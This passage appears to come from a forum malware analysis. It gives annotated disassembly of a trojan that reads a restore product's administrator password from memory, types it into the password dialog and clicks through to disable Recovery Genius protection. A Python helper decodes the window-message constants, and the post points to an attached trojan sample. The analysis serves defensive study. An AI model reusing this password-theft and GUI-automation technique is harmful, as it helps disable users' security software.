PEp0:0040A39E call FindWindowExA ; look for the Traditional-Chinese "查管理者密码" dialog
PEp0:0040A3A3 mov [ebp+hWndParentPass], eax
PEp0:0040A3A6 cmp [ebp+hWndParentPass], 0
PEp0:0040A3AA jnz short loc_40A3C2 ; Traditional-Chinese version found, jump ahead
PEp0:0040A3AC push offset aSAI ; lpszWindow
PEp0:0040A3B1 push offset a32770_1 ; "#32770"
PEp0:0040A3B6 push 0 ; hWndChildAfter
PEp0:0040A3B8 push 0 ; hWndParent
PEp0:0040A3BA call FindWindowExA ; look for the Simplified-Chinese "检查管理者密码" dialog
The password is then read via CallReadMemory.
PEp0:0040A41A call CallReadMemory ; read the password from memory
PEp0:0040A48D push 0 ; lpszWindow
PEp0:0040A48F push offset aEdit_0 ; "Edit"
PEp0:0040A494 push 0 ; hWndChildAfter
PEp0:0040A496 mov eax, [ebp+hWndParentPass]
PEp0:0040A499 push eax ; hWndParent
PEp0:0040A49A call FindWindowExA
PEp0:0040A49F mov esi, eax
PEp0:0040A4A1 mov eax, [ebp+password]
PEp0:0040A4A4 call Test_eax_1
PEp0:0040A4A9 push eax ; lParam
PEp0:0040A4AA push 0 ; wParam
PEp0:0040A4AC push 0Ch ; Msg
PEp0:0040A4AE push esi ; hWnd
PEp0:0040A4AF call SendMessageA ; send WM_SETTEXT (0Ch), writing the password into the Edit control
PEp0:0040A4B4 mov ecx, offset aI ; "定"
PEp0:0040A4B9 mov edx, offset aButton_1 ; "Button"
PEp0:0040A4BE mov eax, [ebp+hWndParentPass]
PEp0:0040A4C1 call IsControlTrue ; check that the control has the expected class
PEp0:0040A4C6 push 0 ; lParam
PEp0:0040A4C8 push 0 ; wParam
PEp0:0040A4CA push 0F5h ; Msg
PEp0:0040A4CF push eax ; hWnd
PEp0:0040A4D0 call SendMessageA ; send BM_CLICK, equivalent to a left click on "确定" (OK)
PEp0:0040A4D5 push 0 ; nCmdShow
PEp0:0040A4D7 mov eax, [ebp+hWndParentPass]
PEp0:0040A4DA push eax ; hWnd
PEp0:0040A4DB call ShowWindow
PEp0:0040A70A push 0 ; nCmdShow
PEp0:0040A70C push edi ; hWnd
PEp0:0040A70D call ShowWindow ; hide the Recovery Genius dialog
PEp0:0040A712 push offset aI_0 ; lpszWindow
PEp0:0040A717 push offset aButton_2 ; "Button"
PEp0:0040A71C push 0 ; hWndChildAfter
PEp0:0040A71E push edi ; hWndParent
PEp0:0040A71F call FindWindowExA ; find the OK button
PEp0:0040A724 mov esi, eax
PEp0:0040A726 test esi, esi
PEp0:0040A728 jz short loc_40A786
PEp0:0040A72A mov edx, offset aStep_6 ; "step.6"
PEp0:0040A72F mov eax, edi
PEp0:0040A731 call SendSetTextMsg ; send WM_SETTEXT to the Recovery Genius window, changing its title to "step.6"
PEp0:0040A736 push 0 ; lParam
PEp0:0040A738 push 0 ; wParam
PEp0:0040A73A push 0F5h ; Msg
PEp0:0040A73F push esi ; hWnd
PEp0:0040A740 call SendMessageA ; send BM_CLICK, equivalent to a left click on "确定" (OK)
PEp0:0040A745 mov ecx, offset aB_0 ; "取"
PEp0:0040A74A mov edx, offset aButton_1 ; "Button"
PEp0:0040A74F mov eax, [ebp+hWndParentPass]
PEp0:0040A752 call IsControlTrue ; check that the control has the expected class
PEp0:0040A757 push 0 ; lParam
PEp0:0040A759 push 0 ; wParam
PEp0:0040A75B push 0F5h ; Msg
PEp0:0040A760 push eax ; hWnd
PEp0:0040A761 call SendMessageA ; send BM_CLICK, equivalent to a left click on Cancel in the parent window
PEp0:0040A766 mov ecx, offset aC_2 ; "&C"
PEp0:0040A76B mov edx, offset aButton_1 ; "Button"
PEp0:0040A770 mov eax, ebx
PEp0:0040A772 call IsControlTrue ; check that the control has the expected class
PEp0:0040A777 push 0 ; lParam
PEp0:0040A779 push 0 ; wParam
PEp0:0040A77B push 0F5h ; Msg
PEp0:0040A780 push eax ; hWnd
PEp0:0040A781 call SendMessageA ; send BM_CLICK, equivalent to a left click that closes the window
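As an added example, not part of the original report or its attachment, the following Python script decodes the raw message constants this listing pushes before SendMessageA/PostMessageA (0Ch, 0F1h, 0F5h) into their winuser.h names, so the GUI-automation sequence in CloseHUJL_1 can be read at a glance. The sample listing is constructed from the lines above, and LINE_RE assumes IDA's "segment:address mnemonic operands ; comment" layout.

```python
import re

# Raw window-message constants the listing pushes before SendMessageA/PostMessageA
# (values from winuser.h).
MSG_NAMES = {0x0C: "WM_SETTEXT", 0xF1: "BM_SETCHECK", 0xF5: "BM_CLICK"}

# Assumed IDA line layout, e.g. "PEp0:0040A208 push 0F5h ; Msg".
LINE_RE = re.compile(r"^\w+:([0-9A-Fa-f]{8})\s+(\w+)\s*([^;]*?)\s*(?:;.*)?$")

def parse_imm(token):
    """Decode a MASM immediate ('0F5h' -> 0xF5, '1' -> 1); None for registers/symbols."""
    m = re.fullmatch(r"([0-9A-Fa-f]+)h", token)
    if m:
        return int(m.group(1), 16)
    return int(token) if token.isdigit() else None

def extract_messages(listing):
    """Return (address, api, message name, wParam) for every SendMessageA/PostMessageA.
    stdcall pushes arguments right to left, so the four pushes preceding the call are
    lParam, wParam, Msg, hWnd in that order."""
    pushes, found = [], []
    for line in listing.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr, mnem, operand = m.group(1), m.group(2).lower(), m.group(3).strip()
        if mnem == "push":
            pushes.append(operand)
        elif mnem == "call":
            if operand in ("SendMessageA", "PostMessageA") and len(pushes) >= 4:
                _lparam, wparam, msg, _hwnd = pushes[-4:]
                code = parse_imm(msg)
                name = MSG_NAMES.get(code, msg if code is None else f"0x{code:X}")
                found.append((addr, operand, name, parse_imm(wparam)))
            pushes.clear()  # the callee consumed whatever was pushed
    return found

# Constructed sample: the three message sends taken from the CloseHUJL_1 listing.
SAMPLE = """\
PEp0:0040A204 push 0 ; lParam
PEp0:0040A206 push 1 ; wParam
PEp0:0040A208 push 0F1h ; Msg
PEp0:0040A20D push eax ; hWnd
PEp0:0040A20E call SendMessageA ; BM_SETCHECK
PEp0:0040A21F call IsControlTrue
PEp0:0040A224 push 0 ; lParam
PEp0:0040A226 push 0 ; wParam
PEp0:0040A228 push 0F5h ; Msg
PEp0:0040A22D push eax ; hWnd
PEp0:0040A22E call PostMessageA; BM_CLICK
PEp0:0040A4A9 push eax ; lParam
PEp0:0040A4AA push 0 ; wParam
PEp0:0040A4AC push 0Ch ; Msg
PEp0:0040A4AE push esi ; hWnd
PEp0:0040A4AF call SendMessageA ; WM_SETTEXT
"""

if __name__ == "__main__":
    for addr, api, name, wparam in extract_messages(SAMPLE):
        print(f"{addr} {api:<13} {name:<12} wParam={wparam}")
```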
The complete analysis document, which also contains the trojan sample, is in the attachment; please download it from the forum.